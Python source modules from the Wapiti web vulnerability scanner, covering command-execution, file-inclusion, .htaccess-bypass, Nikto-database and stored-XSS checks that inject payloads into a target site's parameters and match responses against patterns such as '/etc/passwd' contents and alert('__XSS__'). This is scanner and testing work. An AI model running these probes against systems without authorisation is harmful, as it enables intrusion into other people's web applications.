# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
import requests
import os
from wapitiCore.net import HTTP


class mod_exec(Attack):
    """
    This class implements a command execution attack
    """

    CONFIG_FILE = "execPayloads.txt"

    name = "exec"

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE))

    def __findPatternInResponse(self, data, warned):
        err = ""
        cmd = 0
        if "eval()'d code on line " in data and not warned:
            err = ("Warning eval()")
            warned = 1
        if "PATH=" in data and "PWD=" in data:
            err = _("Command execution")
            cmd = 1
        if "w4p1t1_eval" in data:
            err = _("PHP evaluation")
            cmd = 1
        if "Cannot execute a blank command in" in data and not warned:
            err = _("Warning exec")
            warned = 1
        if "sh: command substitution:" in data and not warned:
            err = _("Warning exec")
            warned = 1
        if "Fatal error: preg_replace" in data and not warned:
            err = _("preg_replace injection")
            warned = 1
        if "Warning: usort()" in data and not warned:
            err = _("Warning usort()")
            warned = 1
        if "Warning: preg_replace():" in data and not warned:
            err = _("preg_replace injection")
            warned = 1
        if "Warning: assert():" in data and not warned:
            err = _("Warning assert")
            warned = 1
        if "Failure evaluating code:" in data and not warned:
            err = _("Evalutation warning")
            warned = 1
        return err, cmd, warned

    def attackGET(self, http_res):
        """This method performs the command execution with method GET"""
        page = http_res.path
        params_list = http_res.get_params
        resp_headers = http_res.headers
        referer = http_res.referer
        headers = {}
        if referer:
            headers["referer"] = referer

        if not params_list:
            # Do not attack application-type files
            if not "content-type" in resp_headers:
                # Sometimes there's no content-type... so we rely on the document extension
                if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                    return
            elif not "text" in resp_headers["content-type"]:
                return

            timeouted = False
            warned = 0
            cmd = 0
            err500 = 0

            for payload in self.payloads:
                if "[VALUE]" in payload:
                    continue
                err = ""
                url = page + "?" + self.HTTP.quote(payload)
                if url not in self.attackedGET:
                    evil_req = HTTP.HTTPResource(url)
                    if self.verbose == 2:
                        print(u"+ {0}".format(url))
                    self.attackedGET.append(url)
                    try:
                        data, code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                    except requests.exceptions.Timeout:
                        if timeouted:
                            continue
                        data = ""
                        code = "408"
                        err = ""
                        self.logO(Anomaly.MSG_TIMEOUT, page)
                        self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
                        self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                     level=Anomaly.MEDIUM_LEVEL,
                                     request=evil_req,
                                     info=Anomaly.MSG_QS_TIMEOUT)
                        timeouted = True
                    else:
                        err, cmd, warned = self.__findPatternInResponse(data, warned)

                    if err != "":
                        self.logVuln(category=Vulnerability.EXEC,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     info=Vulnerability.MSG_QS_INJECT.format(err, page))
                        self.logR(Vulnerability.MSG_QS_INJECT, err, page)
                        self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                    else:
                        if code == "500" and err500 == 0:
                            err500 = 1
                            self.logAnom(category=Anomaly.ERROR_500,
                                         level=Anomaly.HIGH_LEVEL,
                                         request=evil_req,
                                         info=Anomaly.MSG_QS_500)
                            self.logO(Anomaly.MSG_500, page)
                            self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
                    if cmd:
                        break

        for i in range(len(params_list)):
            timeouted = False
            warned = 0
            cmd = 0
            err500 = 0

            saved_value = params_list[i][1]
            if saved_value is None:
                saved_value = ""
            params_list[i][1] = "__EXEC__"
            url = page + "?" + self.HTTP.encode(params_list)
            param_name = self.HTTP.quote(params_list[i][0])

            if url not in self.attackedGET:
                self.attackedGET.append(url)

                for payload in self.payloads:
                    err = ""
                    payload = payload.replace("[VALUE]", saved_value)
                    params_list[i][1] = self.HTTP.quote(payload)
                    evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list))

                    if self.verbose == 2:
                        print(u"+ {0}".format(evil_req.url))

                    try:
                        data, code = self.HTTP.send(evil_req, headers=headers).getPageCode()
                    except requests.exceptions.Timeout:
                        if timeouted:
                            continue
                        data = ""
                        code = "408"
                        err = ""
                        self.logO(Anomaly.MSG_TIMEOUT, page)
                        self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
                        self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                     level=Anomaly.MEDIUM_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name))
                        timeouted = True
                    else:
                        err, cmd, warned = self.__findPatternInResponse(data, warned)

                    if err != "":
                        self.logVuln(category=Vulnerability.EXEC,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info=_("{0} via injection in the parameter {1}").format(err, param_name))
                        self.logR(Vulnerability.MSG_PARAM_INJECT,
                                  err,
                                  page,
                                  param_name)
                        self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                        if cmd:
                            # Successful command execution, go to the next field
                            break
                    else:
                        if code == "500" and err500 == 0:
                            err500 = 1
                            self.logAnom(category=Anomaly.ERROR_500,
                                         level=Anomaly.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=Anomaly.MSG_PARAM_500.format(param_name))
                            self.logO(Anomaly.MSG_500, page)
                            self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
            params_list[i][1] = saved_value

    def attackPOST(self, form):
        """This method performs the command execution with method POST"""

        # copies
        get_params = form.get_params
        post_params = form.post_params
        file_params = form.file_params
        referer = form.referer

        for params_list in [get_params, post_params, file_params]:
            for i in xrange(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""
timeouted = False warned = 0 cmd = 0 err500 = 0 param_name = self.HTTP.quote(params_list[i][0]) if params_list is file_params: params_list[i][1] = ["_EXEC__", params_list[i][1][1]] else: params_list[i][1] = "__EXEC__" attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) for payload in self.payloads: # no quoting: send() will do it for us if params_list is file_params: payload = payload.replace("[VALUE]", saved_value[0]) params_list[i][1][0] = payload else: payload = payload.replace("[VALUE]", saved_value) params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) err = "" try: data, code = self.HTTP.send(evil_req).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True else: err, cmd, warned = self.__findPatternInResponse(data, warned) if err != "": self.logVuln(category=Vulnerability.EXEC, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') if cmd: # Successful command execution, go to the next field break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, 
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                self.logO(Anomaly.MSG_500, evil_req.url)
                                self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                params_list[i][1] = saved_value

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_file.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
import requests
import os
from wapitiCore.net import HTTP


class mod_file(Attack):
    """
    This class implements a file handling attack
    """

    CONFIG_FILE = "fileHandlingPayloads.txt"

    name = "file"

    # The following table contains tuples of (pattern, description, severity)
    # a severity of 1 is a file disclosure (inclusion, read etc) vulnerability
    # a severity of 0 is just the detection of an error returned by the server
    # Most important patterns must appear at the top of this table.
warnings_desc = [ # Vulnerabilities ("Google", _("Remote inclusion vulnerability"), 1), ("root:x:0:0", _("Linux local file disclosure vulnerability"), 1), ("root:*:0:0", _("BSD local file disclosure vulnerability"), 1), ("[boot loader]", _("Windows local file disclosure vulnerability"), 1), ("s:12:\"pear.php.net\";", _("File disclosure vulnerability in include_path"), 1), ("PHP Extension and Application Reposit", _("File disclosure vulnerability in include_path"), 1), ("PEAR, the PHP Extensio", _("highlight_file() vulnerability in basedir"), 1), ("either use the CLI php executable", _("include() of file in include_path"), 1), # Warnings ("java.io.FileNotFoundException:", "Java include/open", 0), ("fread(): supplied argument is not", "fread()", 0), ("fpassthru(): supplied argument is not", "fpassthru()", 0), ("for inclusion (include_path=", "include()", 0), ("Failed opening required", "require()", 0), ("Warning: file(", "file()", 0), ("Warning: file(", "file()", 0), ("Warning: readfile(", "readfile()", 0), ("Warning: readfile(", "readfile()", 0), ("Warning: file_get_contents(", "file_get_contents()", 0), ("Warning: file_get_contents(", "file_get_contents()", 0), ("Warning: show_source(", "show_source()", 0), ("Warning: show_source(", "show_source()", 0), ("Warning: highlight_file(", "highlight_file()", 0), ("Warning: highlight_file(", "highlight_file()", 0), ("System.IO.FileNotFoundException:", ".NET File.Open*", 0), ("error '800a0046'", "VBScript OpenTextFile", 0) ] def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def __findPatternInResponse(self, data, warn): """This method searches patterns in the response from the server""" err_msg = "" inc = 0 for pattern, description, level in self.warnings_desc: if pattern in data: if level == 1: err_msg = description inc = 1 break else: if warn == 0: err_msg = _("Possible {0} 
vulnerability").format(description) warn = 1 break return err_msg, inc, warn def attackGET(self, http_res): """This method performs the file handling attack with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return timeouted = False warn = 0 inc = 0 err500 = 0 for payload in self.payloads: if "[VALUE]" in payload or "[DIRVALUE]" in payload or "[FILE_NAME]" in payload: continue err = "" url = page + "?" + self.HTTP.quote(payload) if url not in self.attackedGET: if self.verbose == 2: print(u"+ {0}".format(url)) self.attackedGET.append(url) evil_req = HTTP.HTTPResource(url) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: # Display a warning about timeout only once for a parameter if timeouted: continue data = "" code = "408" err = "" self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, info=Anomaly.MSG_QS_TIMEOUT) self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": self.logVuln(category=Vulnerability.FILE_HANDLING, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("{0} via injection in the query string").format(err)) self.logR(Vulnerability.MSG_QS_INJECT, err, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) if inc: break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, info=Anomaly.MSG_QS_500) 
self.logO(Anomaly.MSG_500, evil_req.path) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) for i in range(len(params_list)): timeouted = False warn = 0 inc = 0 err500 = 0 param_name = self.HTTP.quote(params_list[i][0]) saved_value = params_list[i][1] if saved_value is None: saved_value = "" params_list[i][1] = "__FILE__" url = page + "?" + self.HTTP.encode(params_list) if url not in self.attackedGET: self.attackedGET.append(url) for payload in self.payloads: err = "" payload = payload.replace('[VALUE]', saved_value) payload = payload.replace('[DIRVALUE]', saved_value.rsplit('/', 1)[0]) payload = payload.replace('[FILE_NAME]', http_res.file_name) params_list[i][1] = self.HTTP.quote(payload) url = page + "?" + self.HTTP.encode(params_list) if self.verbose == 2: print(u"+ {0}".format(url)) evil_req = HTTP.HTTPResource(url) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" err = "" self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": self.logVuln(category=Vulnerability.FILE_HANDLING, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) if inc: break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.path) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) params_list[i][1] = saved_value def 
attackPOST(self, form): """This method performs the file handling attack with method POST""" # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params referer = form.referer err = "" for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): timeouted = False warn = 0 inc = 0 err500 = 0 saved_value = params_list[i][1] if saved_value is None: saved_value = "" param_name = self.HTTP.quote(params_list[i][0]) if params_list is file_params: params_list[i][1] = ["_FILE__", params_list[i][1][1]] else: params_list[i][1] = "__FILE__" attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) for payload in self.payloads: payload = payload.replace('[FILE_NAME]', form.file_name) if params_list is file_params: payload = payload.replace('[VALUE]', saved_value[0]) payload = payload.replace('[DIRVALUE]', saved_value[0].rsplit('/', 1)[0]) params_list[i][1][0] = payload else: payload = payload.replace('[VALUE]', saved_value) payload = payload.replace('[DIRVALUE]', saved_value.rsplit('/', 1)[0]) params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: data, code = self.HTTP.send(evil_req).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) self.logO(Anomaly.MSG_TIMEOUT, evil_req.path) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') timeouted = True else: err, inc, warn = self.__findPatternInResponse(data, warn) if err != "": info_msg 
                            = _("{0} via injection in the parameter {1}")
                            self.logVuln(category=Vulnerability.FILE_HANDLING,
                                         level=Vulnerability.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=info_msg.format(err, param_name))
                            self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name)
                            self.logR(Vulnerability.MSG_EVIL_REQUEST)
                            self.logC(evil_req.http_repr)
                            print('')
                            if inc:
                                break
                        else:
                            if code == "500" and err500 == 0:
                                err500 = 1
                                self.logAnom(category=Anomaly.ERROR_500,
                                             level=Anomaly.HIGH_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                self.logO(Anomaly.MSG_500, evil_req.url)
                                self.logO(Anomaly.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                params_list[i][1] = saved_value

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_htaccess.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2009-2013 Nicolas Surribas
#
# Original authors :
# Anthony DUBOCAGE
# Guillaume TRANCHANT
# Gregory FONTAINE
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly from wapitiCore.net import HTTP class mod_htaccess(Attack): """ This class implements a htaccess attack """ name = "htaccess" doGET = False doPOST = False def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) #this function return code signification when htaccess protection enabled def __returnErrorByCode(self, code): err = "" code = int(code) if code == 401: err = "Authorization Required" elif code == 402: err = "Payment Required" elif code == 403: err = "Forbidden" else: err = "ok" return err def attackGET(self, http_res): url = http_res.path resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if url not in self.attackedGET: if self.verbose == 2: print(u"+ {0}".format(url)) err1 = self.__returnErrorByCode(resp_headers["status_code"]) if err1 != "ok": test_req = HTTP.HTTPResource(url) data1 = self.HTTP.send(test_req, headers=headers).getPage() # .htaccess protection detected if self.verbose >= 1: self.log(_("HtAccess protection found: {0}"), url) evil_req = HTTP.HTTPResource(url, method="ABC") data2, code2 = self.HTTP.send(evil_req, headers=headers).getPageCode() err2 = self.__returnErrorByCode(code2) if err2 == "ok": # .htaccess bypass success if self.verbose >= 1: self.logC(_("|HTTP Code: {0} : {1}"), resp_headers["status_code"], err1) if self.verbose == 2: self.logY(_("Source code:")) self.logW(data1) self.logVuln(category=Vulnerability.HTACCESS, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("{0} HtAccess").format(err1)) self.logR(_(" .htaccess bypass vulnerability: {0}"), evil_req.url) # print output informations by verbosity option if 
                    self.verbose >= 1:
                        self.logC(_("|HTTP Code: {0}"), code2)
                    if self.verbose == 2:
                        self.logY(_("Source code:"))
                        self.logW(data2)
            self.attackedGET.append(url)

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_nikto.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2009-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import csv
import re
import os
import socket
import random
import BeautifulSoup
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability
from wapitiCore.net import HTTP

# Nikto databases are csv files with the following fields (in order) :
#
#  1 - A unique identifier (number)
#  2 - The OSVDB reference number of the vulnerability
#  3 - Unknown (not used by Wapiti)
#  4 - The URL to check for. May contain a pattern to replace (eg: @CGIDIRS)
#  5 - The HTTP method to use when requesting the URL
#  6 - The HTTP status code returned when the vulnerability may exist
#      or a string the HTTP response may contain.
#  7 - Another condition for a possible vulnerability (6 OR 7)
#  8 - Another condition (must match for a possible vulnerability)
#  9 - A condition corresponding to an unexploitable webpage
# 10 - Another condition just like 9
# 11 - A description of the vulnerability with possible BID, CVE or MS references
# 12 - A url-form-encoded string (usually for POST requests)
#
# A possible vulnerability is reported in the following condition :
# ((6 or 7) and 8) and not (9 or 10)


class mod_nikto(Attack):
    """
    This class implements a Nikto attack
    """

    nikto_db = []

    name = "nikto"
    CONFIG_FILE = "nikto_db"

    doGET = False
    doPOST = False

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        user_config_dir = os.getenv('HOME') or os.getenv('USERPROFILE')
        user_config_dir += "/config"
        if not os.path.isdir(user_config_dir):
            os.makedirs(user_config_dir)
        try:
            fd = open(os.path.join(user_config_dir, self.CONFIG_FILE))
            reader = csv.reader(fd)
            self.nikto_db = [l for l in reader if l != [] and l[0].isdigit()]
            fd.close()
        except IOError:
            # Local copy missing or unreadable: fetch the database over
            # plain HTTP (no integrity check) and cache it locally
            try:
                print(_("Problem with local nikto database."))
                print(_("Downloading from the web..."))
                nikto_req = HTTP.HTTPResource("http://cirt.net/nikto/UPDATES/2.1.5/db_tests")
                resp = self.HTTP.send(nikto_req)
                page = resp.getRawPage()

                csv.register_dialect("nikto", quoting=csv.QUOTE_ALL, doublequote=False, escapechar="\\")
                reader = csv.reader(page.split("\n"), "nikto")
                self.nikto_db = [l for l in reader if l != [] and l[0].isdigit()]

                fd = open(os.path.join(user_config_dir, self.CONFIG_FILE), "w")
                writer = csv.writer(fd)
                writer.writerows(self.nikto_db)
                fd.close()
            except socket.timeout:
                print(_("Error downloading Nikto database"))

    def attack(self, urls, forms):
        junk_string = "w" + "".join([random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 5000)])
        for l in self.nikto_db:
            match = match_or = match_and = False
            fail = fail_or = False

            osv_id = l[1]
            path = l[3]
            method = l[4]
            vuln_desc = l[10]
            post_data = l[11]

            path =
path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub("JUNK\((\d+)\)", lambda x: junk_string[:int(x.group(1))], path) if path[0] == "@": continue if path[0] != "/": path = "/" + path url = "" try: url = "http://" + self.HTTP.server + path except UnicodeDecodeError: continue evil_req = None if method == "GET": evil_req = HTTP.HTTPResource(url) elif method == "POST": evil_req = HTTP.HTTPResource(url, post_params=post_data, method=method) else: evil_req = HTTP.HTTPResource(url, post_params=post_data, method=method) if self.verbose == 2: try: if method == "GET": print(u"+ {0}".format(evil_req.url)) else: print(u"+ {0}".format(evil_req.http_repr)) except Exception, e: continue try: resp = self.HTTP.send(evil_req) except Exception, e: # requests bug print(e) continue page, code = resp.getPageCode() encoding = BeautifulSoup.BeautifulSoup(page).originalEncoding if encoding: page = unicode(page, encoding, "ignore") raw = " ".join([x + ": " + y for x, y in resp.getHeaders().items()]) raw += page # First condition (match) if len(l[5]) == 3 and l[5].isdigit(): if code == int(l[5]): match = True else: if l[5] in raw: match = True # Second condition (or) if l[6] != "": if len(l[6]) == 3 and l[6].isdigit(): if code == int(l[6]): match_or = True else: if l[6] in raw: match_or = True # Third condition (and) if l[7] != "": if len(l[7]) == 3 and l[7].isdigit(): if code == int(l[7]): match_and = True else: if l[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if l[8] != "": if len(l[8]) == 3 and l[8].isdigit(): if code == int(l[8]): fail = True else: if l[8] in raw: fail = True # Fifth condition (or) if l[9] != "": if len(l[9]) == 3 and l[9].isdigit(): if code == int(l[9]): fail_or = True else: if l[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or 
            fail_or):
                print(url)
                print(vuln_desc)
                refs = []
                if osv_id != "0":
                    refs.append("http://osvdb.org/show/osvdb/" + osv_id)

                # CERT
                m = re.search("(CA\-[0-9]{4}-[0-9]{2})", vuln_desc)
                if m is not None:
                    refs.append("http://www.cert.org/advisories/" + m.group(0) + ".html")

                # SecurityFocus
                m = re.search("BID\-([0-9]{4})", vuln_desc)
                if m is not None:
                    refs.append("http://www.securityfocus.com/bid/" + m.group(1))

                # Mitre.org
                m = re.search("((CVE|CAN)\-[0-9]{4}-[0-9]{4})", vuln_desc)
                if m is not None:
                    refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + m.group(0))

                # CERT Incidents
                m = re.search("(IN\-[0-9]{4}\-[0-9]{2})", vuln_desc)
                if m is not None:
                    refs.append("http://www.cert.org/incident_notes/" + m.group(0) + ".html")

                # Microsoft Technet
                m = re.search("(MS[0-9]{2}\-[0-9]{3})", vuln_desc)
                if m is not None:
                    refs.append("http://www.microsoft.com/technet/security/bulletin/" + m.group(0) + ".asp")

                info = vuln_desc
                if refs != []:
                    print(_("References:"))
                    print(u" {0}".format(u"\n ".join(refs)))
                    info += "\n" + _("References:") + "\n"
                    info += "\n".join(['' + x + '' for x in refs])
                print('')

                self.logVuln(category=Vulnerability.NIKTO,
                             level=Vulnerability.HIGH_LEVEL,
                             request=evil_req,
                             info=info)

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_permanentxss.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import socket
import requests
import os
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
from wapitiCore.net import HTTP


class mod_permanentxss(Attack):
    """
    This class implements a cross site scripting attack
    """

    # magic strings we must see to be sure script is vulnerable to XSS
    # payloads must be created on those patterns
    script_ok = ["alert('__XSS__')", "alert(\"__XSS__\")", "String.fromCharCode(0,__XSS__,1)"]

    # simple payloads that don't rely on their position in the DOM structure
    # payloads injected after closing a tag attribute value (attrval) or in the
    # content of a tag (a text node between an opening and a closing tag)
    # only trick here must be on character encoding, filter bypassing, stuff like that
    # from the simplest to the most complex, Wapiti will stop on the first working
    independant_payloads = []

    name = "permanentxss"
    require = ["xss"]
    PRIORITY = 6

    HTTP = None

    # two dict for permanent XSS scanning
    GET_XSS = {}
    POST_XSS = {}

    # key = xss code, value = payload
    SUCCESSFUL_XSS = {}

    CONFIG_FILE = "xssPayloads.txt"

    MSG_VULN = _("Stored XSS vulnerability")

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        self.independant_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE))

    # permanent XSS
    def attack(self, get_resources, forms):
        """This method searches XSS which could be permanently stored in the web application"""
        for http_resource in get_resources:
            if http_resource.method != "GET":
                continue
            url = http_resource.url
            target_req = HTTP.HTTPResource(url)
            page = http_resource.path
            referer = http_resource.referer
            headers = {}
            if referer:
                headers["referer"] = referer
            if self.verbose >= 1:
                print(u"+ {0}".format(url))

            try:
                resp = self.HTTP.send(target_req, headers=headers)
                data = resp.getPage()
            except requests.exceptions.Timeout, timeout:
                data = ""
                resp = timeout
            except socket.error, se:
                data = ""
                resp = None
                print(_('error: {0} while attacking {1}').format(repr(str(se[1])), url))
            except Exception, e:
                print(_('error: {0} while attacking {1}').format(repr(str(e[0])), url))
                continue

            # Search for permanent XSS vulns which were injected via GET
            if self.doGET == 1:
                for code in self.GET_XSS:
                    if code in data:
                        # code found in the webpage !
